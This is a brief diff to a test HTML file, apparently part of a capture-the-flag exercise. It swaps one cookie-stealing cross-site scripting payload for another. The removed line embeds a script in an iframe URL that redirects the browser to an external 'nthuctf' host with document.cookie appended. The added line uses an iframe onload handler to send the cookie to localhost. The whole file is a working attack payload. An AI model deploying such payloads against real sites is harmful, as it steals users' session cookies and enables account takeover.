--- a/test.html
+++ b/test.html
@@ -1,5 +1,3 @@
 <html>
-    <iframe src=https://nthuctf.herokuapp.com?a=<script>document.location.replace("http://nthuctf.herokuapp.com/?c="+document.cookie)</script>>
-
-    </iframe>
+    <iframe onload="document.location.replace(`http://localhost/?c=`+document.cookie)"></iframe>
 </html>
